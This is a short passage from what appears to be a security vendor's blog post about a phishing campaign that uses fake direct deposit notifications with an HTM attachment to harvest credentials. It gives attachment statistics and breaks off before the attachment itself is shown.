Direct deposit is a great convenience for businesses and individuals.
It's also a great way to launch a scam.
This attack, which bypassed ATP, takes advantage of a direct deposit notification, something that many employees get on payday.
This attack comes with an HTM attachment file that has the payload to the cred harvesting platform. In the last month, Avanan has seen 1.2 million HTM or HTML email attachments and 1.1 million of those emails were clean, which tells us that end-users are used to seeing this file type and might trust downloading it.
Here's what the HTM attachment looks like: